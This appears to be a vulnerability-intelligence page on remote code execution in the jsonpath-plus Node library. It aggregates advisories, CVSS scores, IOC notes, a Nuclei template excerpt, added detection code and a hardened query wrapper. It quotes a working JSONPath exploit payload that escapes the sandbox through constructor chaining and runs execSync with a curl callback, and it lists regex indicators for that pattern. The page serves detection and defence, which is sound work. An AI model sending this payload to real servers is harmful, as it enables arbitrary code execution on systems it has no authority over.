CVE-2024-21534
Published 2024-10-11. CVE-2024-21534: All versions of the package jsonpath-plus are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary…
Priority P274 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EXPLOIT · EPSS 9.08% (94.7th percentile)
All versions of the package jsonpath-plus are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** There were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).
Detection & IOCs (extracted from sources)
Exploit payload (command):
```text
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())";Ethan=''[['constructor']][['constructor']](p);Ethan())]
```
- The exploit payload targets POST endpoints that accept a JSON body with a 'path' key containing a JSONPath expression; the expression abuses constructor chaining to escape eval='safe' mode and executes arbitrary code via child_process.execSync.
- Detection via out-of-band DNS callback: successful exploitation triggers a DNS lookup to the interactsh/canary URL embedded in the payload via curl.
- An HTTP response body containing '"result":' on a targeted endpoint indicates the JSONPath query was processed by a jsonpath-plus-backed handler; pair it with the DNS callback to confirm that code actually executed.
- The exploit uses the constructor-chain pattern ''[['constructor']][['constructor']](p) to break out of the safe eval sandbox; monitor for this string pattern in incoming JSON POST bodies.
- The eval='safe' bypass (CVE-2025-1302) is the result of an incomplete fix for CVE-2024-21534, which originally abused the Node.js vm module; eval='safe' is the library's unsafe default.
- Multiple bypass payloads exist even after the partial fixes in versions 10.0.0–10.1.0; treat all jsonpath-plus < 10.3.0 as exploitable.
- Exploitation requires jsonpath-plus to be used with its unsafe default eval='safe' mode; applications that explicitly disable eval, or that never pass user-controlled input into JSONPath queries, are not exploitable.
- Red Hat downgraded the impact to low because no code paths in their affected products allow exploitation, and in OpenShift AI the direct dependency's feature requiring jsonpath-plus is never loaded.
- Detection rules that target only the original vm-based payload pattern will miss the newer constructor-chain variants that bypassed the partial fixes in 10.0.0–10.1.0.
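The two points above that a responder most needs to see for themselves are why the quoted payload reaches `Function` without ever writing that word, and what a body-level check for the constructor-chain indicator looks like. The following is an added example, not code from the advisory, the Nuclei template or the jsonpath-plus project; the request field names (`path`, `json`) and the sample bodies are constructed for the example.

```javascript
// Added example (not from the advisory or the jsonpath-plus project).
// Part 1: the escape primitive behind the quoted payload.
// Part 2: a detector for the IOC patterns above, run over constructed JSON bodies.
// The body field names "path" and "json" are assumptions about the target app.

// --- 1. The escape primitive ---------------------------------------------------
// An array used as a property key is coerced with toString(), so [['constructor']]
// is the key "constructor". ''[['constructor']] is String, and
// String[['constructor']] is Function, reached without the tokens `Function` or
// `eval` ever appearing in the expression.
function reachFunctionViaChain() {
  return ''[['constructor']][['constructor']] === Function;
}

// Compiling and running a harmless body through that constructor is the same
// primitive the payload uses to call child_process.execSync.
function compileViaChain(src) {
  return ''[['constructor']][['constructor']](src)();
}

// --- 2. Detection over inbound JSON bodies ---------------------------------------
// Indicators taken from the payload and IOC bullets on this page, plus the obvious
// neighbours (any `constructor` member access, the Node process/require surface).
const INDICATORS = [
  { name: 'constructor-chain', re: /\[\s*\[\s*['"]constructor['"]\s*\]\s*\]/ },
  { name: 'constructor-member', re: /\bconstructor\b/ },
  { name: 'node-process-surface', re: /process\.mainModule|\brequire\s*\(|child_process|execSync/ },
  { name: 'jsonpath-filter', re: /\?\(/ },
];

// Yield every string value in a parsed JSON document together with its location,
// so the check does not depend on the application naming its parameter `path`.
function* stringValues(node, where = '$') {
  if (typeof node === 'string') {
    yield [where, node];
  } else if (Array.isArray(node)) {
    for (let i = 0; i < node.length; i++) yield* stringValues(node[i], `${where}[${i}]`);
  } else if (node && typeof node === 'object') {
    for (const k of Object.keys(node)) yield* stringValues(node[k], `${where}.${k}`);
  }
}

// Returns { parseError, findings }. A finding names the location, the indicators
// hit and a truncated sample. A bare JSONPath filter such as $..book[?(@.price<10)]
// is legitimate, so 'jsonpath-filter' on its own never produces a finding.
function inspectBody(rawBody) {
  let parsed;
  try {
    parsed = JSON.parse(rawBody);
  } catch (e) {
    return { parseError: true, findings: [] };
  }
  const findings = [];
  for (const [where, s] of stringValues(parsed)) {
    const hits = INDICATORS.filter((ind) => ind.re.test(s)).map((ind) => ind.name);
    if (hits.some((h) => h !== 'jsonpath-filter')) {
      findings.push({ where, hits, sample: s.slice(0, 120) });
    }
  }
  return { parseError: false, findings };
}

// Constructed sample bodies (not captured traffic). The first embeds the payload
// quoted in the IOC section verbatim, interactsh placeholder included.
const SAMPLE_BODIES = {
  exploit: JSON.stringify({
    path: "$..[?(p=\"console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())\";Ethan=''[['constructor']][['constructor']](p);Ethan())]",
    json: { a: 1 },
  }),
  benignFilter: JSON.stringify({ path: '$..book[?(@.price<10)].title', json: {} }),
  benignPlain: JSON.stringify({ path: '$.store.book[*].author', json: {} }),
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log('Function reachable via chain:', reachFunctionViaChain());
  console.log('compileViaChain("return 6*7") ->', compileViaChain('return 6*7'));
  for (const [name, body] of Object.entries(SAMPLE_BODIES)) {
    console.log(name, JSON.stringify(inspectBody(body).findings));
  }
}
```

The detector deliberately walks every string in the body rather than only a `path` key, because the parameter name is the one thing the IOC list cannot know about a given application. It also refuses to alert on `?(` alone: JSONPath filters are a normal feature, and an alert that fires on every filter will be tuned out before the real payload arrives.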
CVSS provenance

| Source | Version | Score | Severity | Vector |
| --- | --- | --- | --- | --- |
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| ghsa | | 9.8 | CRITICAL | |
| osv | | 9.8 | CRITICAL | |
| vulncheck | | 9.8 | CRITICAL | |
| vendor_redhat | | 9.8 | CRITICAL | |
Red Hat
CVE-2025-1302 [CRITICAL] CWE-94 · jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
vendor_redhat · 2025-02-15 · CVSS 9.8
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.
**Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
A flaw was found in jsonpath-plus. This vulnerability allows remote code execution (RCE) via improper input sanitization, exploiting the unsafe default usage of eval='safe' mode.
Statement: Red Hat's initial impact rating of critical has been downgraded to low. While the vulnerable code is technically still present within Red Hat pro
Red Hat
CVE-2024-21534 [CRITICAL] CWE-94 · jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
vendor_redhat · 2024-10-11 · CVSS 9.8
All versions of the package jsonpath-plus are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of vm in Node.
**Note:** There were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).
A flaw was found in jsonpath-plus. This vulnerability allows remote code execution via improper input sanitisation and unsafe default usage of the vm module in Node.js. Attackers can exploit this by executing arbitrary cod
OSV
CVE-2025-1302 [CRITICAL] · JSONPath Plus allows Remote Code Execution
osv · 2025-02-15 · CVSS 9.8
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.
**Note:** This is caused by an incomplete fix for CVE-2024-21534.
GHSA
CVE-2025-1302 [CRITICAL] CWE-94 · JSONPath Plus allows Remote Code Execution
ghsa · 2025-02-15 · CVSS 9.8
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.
**Note:** This is caused by an incomplete fix for CVE-2024-21534.
VulnCheck
CVE-2025-1302 [CRITICAL] · Improper Control of Generation of Code ('Code Injection')
vulncheck · 2025 · CVSS 9.8
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
Affected: JSONPath-plus JSONPath-plus
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-11-19&host_type=src&vulnerability=cve-2025-1302; https://das
OSV
CVE-2024-21534 [CRITICAL] · JSONPath Plus Remote Code Execution (RCE) Vulnerability
osv · 2024-10-11
Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of vm in Node.
**Note:** There were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).
GHSA
CVE-2024-21534 [CRITICAL] CWE-94 · JSONPath Plus Remote Code Execution (RCE) Vulnerability
ghsa · 2024-10-11
Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of vm in Node.
**Note:** There were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).
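Every advisory above turns on the same two facts: the library's default `eval='safe'` mode evaluates filter and script expressions, and versions before 10.3.0 let that evaluator be escaped. The remediation is the upgrade, but an application that must accept user-supplied JSONPath should also stop expressions from reaching the evaluator at all. The wrapper below is an added example, not code from the jsonpath-plus project or any advisory: it accepts only plain member and subscript paths, then calls the library with `eval: false`. The option names `{ path, json, eval }` and the CommonJS export `JSONPath` are the library's documented ones; the 256-character cap and the accepted grammar are this example's own choices, and the module is required lazily so the validator runs without the package installed.

```javascript
// Added example, not jsonpath-plus project code. Defence in depth for applications
// that must accept user-supplied JSONPath: reject expression syntax before the
// library sees it, and run the library with expression evaluation disabled.

// Accepted grammar: root `$`, dotted members, `*`, recursive descent `..`, and
// subscripts that are `*`, an integer or slice, or one quoted string. No `(`, `?`,
// `@`, unions or unquoted operators can appear, so the expression evaluator is
// never reached whatever eval mode the installed version defaults to.
const PLAIN_PATH =
  /^\$(?:\.\.?(?:[A-Za-z_][A-Za-z0-9_]*|\*)|\.\.(?=\[)|\[(?:\*|-?\d+(?::-?\d*)?(?::-?\d+)?|'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")\])*$/;

// The 256-character cap is an assumption for this example, not a library limit.
function isPlainPath(path) {
  return typeof path === 'string' && path.length <= 256 && PLAIN_PATH.test(path);
}

function safeQuery(path, json) {
  if (!isPlainPath(path)) {
    throw new Error('rejected JSONPath: only plain member/subscript paths are accepted');
  }
  // Lazy require keeps the validator usable where the package is not installed.
  const { JSONPath } = require('jsonpath-plus');
  // eval: false disables the library's filter/script expression evaluation; together
  // with the grammar check above it is a second control, not the only one.
  return JSONPath({ path, json, eval: false });
}

// Constructed inputs (not from the advisory): the constructor-chain shape from this
// page's IOC section, a legitimate filter that this wrapper still refuses (filters are
// out of scope for it by design), and plain paths that pass.
const PATH_CHECKS = [
  ["$..[?(p=\"\";Ethan=''[['constructor']][['constructor']](p);Ethan())]", false],
  ['$..book[?(@.price<10)].title', false],
  ['$.store.book[*].author', true],
  ["$..book[0:2]['title']", true],
  ['$', true],
  ['$.a(b)', false],
];

// True when every constructed path is classified as expected.
function checkAll() {
  return PATH_CHECKS.every(([p, expected]) => isPlainPath(p) === expected);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [p, expected] of PATH_CHECKS) {
    const got = isPlainPath(p);
    console.log(got ? 'accept' : 'reject', got === expected ? 'ok' : 'MISMATCH', p);
  }
  try {
    console.log(safeQuery('$.store.book[*].author', { store: { book: [{ author: 'A' }] } }));
  } catch (e) {
    console.log('safeQuery:', e.message); // MODULE_NOT_FOUND when jsonpath-plus is absent
  }
}
```

Rejecting `?(` outright costs the application JSONPath filters, which is the point: if the product needs filtered queries over untrusted input, the filter predicate has to be modelled as structured parameters the server assembles itself, not as a string the library evaluates.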
No detection rules found.
Nuclei
CVE-2025-1302 [CRITICAL] · JSONPath Plus < 10.3.0 - Remote Code Execution
nuclei · CVSS 9.8
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534]
Template:
```yaml
id: CVE-2025-1302

info:
  name: JSONPath Plus < 10.3.0 - Remote Code Execution
  author: Jaenact
  severity: critical
  description: |
    Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for
```
No writeups or analysis indexed.
Published: 2024-10-11